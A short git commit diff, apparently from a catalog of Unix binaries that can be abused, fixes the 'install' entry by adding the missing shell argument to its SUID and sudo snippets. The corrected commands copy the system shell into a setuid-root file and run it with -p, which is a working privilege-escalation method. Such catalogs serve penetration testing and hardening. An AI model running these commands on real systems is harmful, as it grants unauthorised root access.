Added missing shell file

This commit is contained in:
Emanuel Duss 2020-11-13 12:09:04 +01:00
parent cb7cb672f2
commit de10e4761e

View File

@ -3,11 +3,11 @@ functions:
suid:
- code: |
TF=$(mktemp)
install -m 4755 $TF
install -m 4755 `which sh` $TF
$TF -p
sudo:
- code: |
TF=$(mktemp)
sudo install -m 4755 $TF
sudo install -m 4755 `which sh` $TF
$TF -p
---